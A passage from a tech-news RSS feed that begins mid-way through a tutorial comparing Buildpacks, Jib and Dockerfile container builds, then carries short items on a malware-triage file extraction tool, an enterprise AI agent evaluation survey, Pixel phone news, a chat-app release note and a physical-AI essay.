&lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Tool] Magic Extractor — identify and unpack unknown files, installers and embedded payloads on Windows]]></title>
<description><![CDATA[I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method. That idea eventually became Magic Extractor, an open-source utility intended to help with static triage and the initi...]]></description>
<link>https://tsecurity.de/de/3662625/malware-trojaner-viren/tool-magic-extractor-identify-and-unpack-unknown-files-installers-and-embedded-payloads-on-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662625/malware-trojaner-viren/tool-magic-extractor-identify-and-unpack-unknown-files-installers-and-embedded-payloads-on-windows/</guid>
<pubDate>Sun, 12 Jul 2026 04:18:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I wanted a Windows-friendly alternative to tools such as Binwalk and UniExtract, focused on identifying unknown files and automatically choosing the appropriate extraction method.</p> <p>That idea eventually became <strong>Magic Extractor</strong>, an open-source utility intended to help with static triage and the initial unpacking of suspicious samples.</p> <p>It can be useful for:</p> <ul> <li>Identifying files whose extension is missing or misleading</li> <li>Unpacking installers, SFX archives and uncommon compression formats</li> <li>Extracting nested archives recursively</li> <li>Listing contents without extraction</li> <li>Carving archives and payloads embedded at arbitrary offsets</li> <li>Trying multiple handlers when detection is ambiguous</li> </ul> <p>Detection combines PureMagic, custom magic signatures, Detect It Easy, Binwalk and Magika. The detected type is then routed to the appropriate bundled extractor.</p> <p>Example:</p> <p><code>magic-extractor identify suspicious.bin</code></p> <p><code>magic-extractor extract suspicious.bin --recursive</code></p> <p><code>magic-extractor carve firmware.bin --list</code></p> <p>It currently supports more than 80 formats, including archives, installers, disk images, forensic images and embedded content.</p> <p>This is not a malware detector, sandbox or replacement for dynamic analysis. It is mainly intended as a supporting tool for file identification, unpacking and static analysis workflows.</p> <p>GitHub:</p> <p><a href="https://github.com/xchwarze/magic-extractor">https://github.com/xchwarze/magic-extractor</a></p> <p>Feedback from malware analysts and reverse engineers would be especially useful, particularly regarding formats, packers or installers that are currently difficult to extract.</p> <p>As always, suspicious files should only be handled inside an isolated analysis environment.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/xchwarze"> /u/xchwarze </a> <br> <span><a href="https://github.com/xchwarze/magic-extractor">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uu1rni/tool_magic_extractor_identify_and_unpack_unknown/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built Magic Extractor — a universal file extraction tool for Windows]]></title>
<description><![CDATA[submitted by    /u/xchwarze   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3661088/reverse-engineering/i-built-magic-extractor-a-universal-file-extraction-tool-for-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661088/reverse-engineering/i-built-magic-extractor-a-universal-file-extraction-tool-for-windows/</guid>
<pubDate>Sat, 11 Jul 2026 04:08:23 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/xchwarze"> /u/xchwarze </a> <br> <span><a href="https://github.com/xchwarze/magic-extractor">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1usrhro/i_built_magic_extractor_a_universal_file/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise AI is entering an evaluation gap: Agents are gaining autonomy faster than companies can verify them]]></title>
<description><![CDATA[Enterprise AI teams are giving agents more freedom at the same moment their confidence in automated testing is collapsing.Half of enterprises have deployed an AI agent or LLM feature that passed internal evaluations and yet still caused a customer-facing failure — one in four more than once — acc...]]></description>
<link>https://tsecurity.de/de/3660672/it-nachrichten/enterprise-ai-is-entering-an-evaluation-gap-agents-are-gaining-autonomy-faster-than-companies-can-verify-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660672/it-nachrichten/enterprise-ai-is-entering-an-evaluation-gap-agents-are-gaining-autonomy-faster-than-companies-can-verify-them/</guid>
<pubDate>Fri, 10 Jul 2026 21:18:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise AI teams are giving agents more freedom at the same moment their confidence in automated testing is collapsing.</p><p>Half of enterprises have deployed an AI agent or LLM feature that passed internal evaluations and yet still caused a customer-facing failure — one in four more than once — according to the June 2026 VB Pulse survey of 157 qualified enterprise respondents at companies with 100 or more employees.</p><p>The sample is self-selected rather than a probability sample, so the findings should be read as directional, not precise.</p><p>But enterprises are not responding by slowing automation:<b> 66% of respondents already permit some production deployment without human review </b>or are building systems intended to do so within the next 12 months. Only 5% say they fully trust the automated evaluations that would make those release decisions.</p><p>That mismatch is the evaluation gap: the autonomy ceiling is rising faster than the assurance beneath it. </p><p>It also fits a broader thesis that will be explored at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>: enterprises ship agents first, while the control layers around identity, evaluation, cost, context and orchestration are arriving later. The next year will be a retrofit cycle, with buyers shifting budget toward the systems that make agentic deployments governable and dependable.</p><h2>Why a passing evaluation is not a working agent</h2><p>Traditional software testing usually asks whether a defined input produces an expected output. Agent testing is harder because the system may choose its own sequence of steps, call tools, retrieve data, alter state and respond differently from one run to the next.</p><p>An agent can make several individually plausible decisions and still reach the wrong result. It may retrieve the correct account but update the wrong field. It may draft a valid refund request but send it without approval. It may call five tools successfully before a sixth step leaks sensitive information or leaves a workflow incomplete.</p><p>The survey shows enterprises already recognize this limitation. <b>The most common reason for distrusting automated evaluation is poor alignment with real-world outcomes, cited by 29% of respondents.</b> Bias or inconsistency follows at 21%, lack of explainability at 18%, and data leakage or privacy concerns at 17%.</p><p>That hierarchy matters. Enterprises are saying the score often does not predict what happens when a customer, employee or business process encounters the agent in production — not that automated scoring is too slow or expensive.</p><p><a href="https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.600-1.pdf">NIST makes a similar point in its Generative AI Profile</a>: measurements gathered in controlled environments may not transfer cleanly to deployment because behavior changes with prompts, users, context and operating conditions. Its guidance calls for field testing, post-deployment monitoring and clear processes for escalating failures.</p><div></div><h2>Capability is not consistency</h2><p>A single successful run proves that an agent can complete a task. It does not prove that it will complete the task reliably.</p><p><a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">Anthropic’s guidance on agent evaluation</a> distinguishes between measuring whether a system succeeds at least once across repeated attempts and whether it succeeds every time. That distinction is essential for customer-facing or operational workflows. A model that occasionally produces an excellent answer may still be unacceptable if the same task fails unpredictably on the next attempt.</p><p>Enterprise teams should therefore treat repeatability as a first-class metric. That means running the same scenario multiple times, varying phrasing and context, testing tool failures, and measuring whether the final business outcome remains correct even when the route changes.</p><p>The evaluation set also has to evolve. Every production incident should become a permanent regression test. Customer escalations, failed tool calls, incorrect approvals and data-handling mistakes should feed back into the pre-deployment suite rather than remaining isolated support cases.</p><h2>Autonomy should expand by risk, not by ambition</h2><p>The survey does not imply that every agent action should require a person. Human review cannot scale across millions of low-consequence decisions.</p><p>But zero-human operation should be earned by demonstrated reliability and bounded by the consequences of failure.</p><p>Low-risk actions such as drafting internal summaries or categorizing documents can tolerate broader autonomy. Financial transactions, customer communications, code deployment, access-control changes and data deletion need stricter thresholds, repeated consistency tests, policy checks, rollback mechanisms and clear human escalation paths.</p><p>The risk isn't evenly distributed by company size, either. Larger enterprises — those with 2,500 or more employees — are moving toward zero-human deployment fastest, at 70% versus 64% for smaller companies, and they're also shipping more agents that go on to fail a customer, at 54% versus 48%. </p><p>That is the warning for enterprise leaders. Removing the human from the loop does not remove uncertainty. Without stronger assurance, it converts uncertainty into an automated production decision.</p><p>The market will keep pushing toward greater autonomy because the economic incentive is real. The organizations best positioned won't be those that remove people fastest — they'll be the ones that treat repeatability and regression testing as seriously as deployment speed.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixel-Smartphones: Google bringt einen magischen KI-Assistenten – ‚Gemini Proactive Assistant‘ (Teardown)]]></title>
<description><![CDATA[Google hat mit der zehnten Generation der Pixel-Smartphones die magischen Funktionen eingeführt, die einen lokalen KI-Assistenten bereitstellen. Mit dem bevorstehenden Sprung auf die Pixel 11-Smartphones bringt man das Ganze in die nächste Generation, die sich jetzt im Rahmen eines Teardowns zeig...]]></description>
<link>https://tsecurity.de/de/3659459/it-nachrichten/pixel-smartphones-google-bringt-einen-magischen-ki-assistenten-gemini-proactive-assistant-teardown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659459/it-nachrichten/pixel-smartphones-google-bringt-einen-magischen-ki-assistenten-gemini-proactive-assistant-teardown/</guid>
<pubDate>Fri, 10 Jul 2026 13:03:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="363" src="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg" class="attachment-large size-large wp-post-image" alt="pixel 9 magic" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-300x170.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-768x435.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-640x362.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-800x453.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Google hat mit der zehnten Generation der Pixel-Smartphones die magischen Funktionen eingeführt, die einen lokalen KI-Assistenten bereitstellen. Mit dem bevorstehenden Sprung auf die <a href="https://www.googlewatchblog.de/2026/07/pixel-11-die-neuen-google-smartphones-werden-teurer-leak-verraet-speichervarianten-und-verkaufspreise/"><strong>Pixel 11-Smartphones</strong></a> bringt man das Ganze in die nächste Generation, die sich jetzt im Rahmen eines Teardowns zeigt. Der nächste Anlauf ist der <strong>Gemini Proactive Assistant</strong>, der hilfreiche Informationen liefern soll.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/pixel-smartphones-google-bringt-einen-magischen-ki-assistenten-gemini-proactive-assistant-teardown/">Pixel-Smartphones: Google bringt einen magischen KI-Assistenten – ‚Gemini Proactive Assistant‘ (Teardown)</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/93f8ab5c7bcd4e5e93b55bbceb627ae7"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/93f8ab5c7bcd4e5e93b55bbceb627ae7" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/pixel-smartphones-google-bringt-einen-magischen-ki-assistenten-gemini-proactive-assistant-teardown/">Pixel-Smartphones: Google bringt einen magischen KI-Assistenten – ‚Gemini Proactive Assistant‘ (Teardown)</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.18.0]]></title>
<description><![CDATA[Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.]]></description>
<link>https://tsecurity.de/de/3657397/tools/v8180/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657397/tools/v8180/</guid>
<pubDate>Thu, 09 Jul 2026 16:37:56 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Polls can now be created in individual chats too. Present a curated list of choices to your indecisive friend, or recapture the magic of passing a note to your crush by creating a “Do you like me? Y/N/Maybe” poll.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[I read Careless People, the Meta tell-all — and it made me want the chapter Sarah Wynn-Williams couldn’t write]]></title>
<description><![CDATA[Reading Careless People helped me understand how Facebook’s internal culture may have allowed Mark Zuckerberg’s strange metaverse obsession to become Meta’s defining idea.]]></description>
<link>https://tsecurity.de/de/3657333/it-nachrichten/i-read-careless-people-the-meta-tell-all-and-it-made-me-want-the-chapter-sarah-wynn-williams-couldnt-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657333/it-nachrichten/i-read-careless-people-the-meta-tell-all-and-it-made-me-want-the-chapter-sarah-wynn-williams-couldnt-write/</guid>
<pubDate>Thu, 09 Jul 2026 16:17:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Reading Careless People helped me understand how Facebook’s internal culture may have allowed Mark Zuckerberg’s strange metaverse obsession to become Meta’s defining idea.]]></content:encoded>
</item>
<item>
<title><![CDATA[Physical AI will see the fusion of robotics and AI transform the world]]></title>
<description><![CDATA[Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operati...]]></description>
<link>https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</guid>
<pubDate>Thu, 09 Jul 2026 13:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operational cultures.</p>



<p>In recent times, we have seen machines attain their highest structural complexity, productivity, and best aesthetics yet. The most relevant new technologies today focus on creating high-throughput physical machines and software that ‘thinks’, and, more futuristically, a fusion of both.</p>



<h2 class="wp-block-heading">From moving machines to intelligent humanoids</h2>



<p>Evolving from ‘moving machines’ capable of handling repetitive tasks to intelligent machines is a century-long goal for robotics. The rapid growth in this sector over the past half-decade, with a <a href="https://www.mordorintelligence.com/industry-reports/robotics-market" target="_blank" rel="noreferrer noopener">$218 billion projection for 2031</a>, is driven by expectations that advancements in AI will extend to robotics and expedite the development of intelligent robots.</p>



<p>Current prototypes are robots capable of taking initiatives or executing tasks more efficiently with less supervision. These have been applied in agriculture, industrial-grade production, and healthcare.</p>



<p>Humanoid robots have attracted the most attention due to the excitement around their potential as near-human machines and the signals their development sends for the future of human-machine coexistence.</p>



<p>Tech leaders around the world are contributing to advancing physical AI with optimism about the impact of robotics on humanity.</p>



<p>Physical AI is a department of artificial intelligence specializing in developing AI algorithms and models for locomotive systems. This includes every kind of robot and, at a more advanced level, humans.</p>



<p>Recent developments in this field include <a href="https://x.com/Figure_robot/status/2059350969700491632" target="_blank" rel="noreferrer noopener">Figure AI’s humanoid robot deployments</a> and Tether’s investment in the <a href="https://tether.io/news/tether-to-lead-neura-robotics-series-c-financing-one-of-the-largest-up-to-1-4bn-robotics-physical-ai-investment-rounds-on-record-to-power-the-financial-and-intelligence-layer/" target="_blank" rel="noreferrer noopener">NEURA</a>, leading the fundraising of up to $1.4 billion in one of the largest robotics and physical AI investment rounds on record.</p>



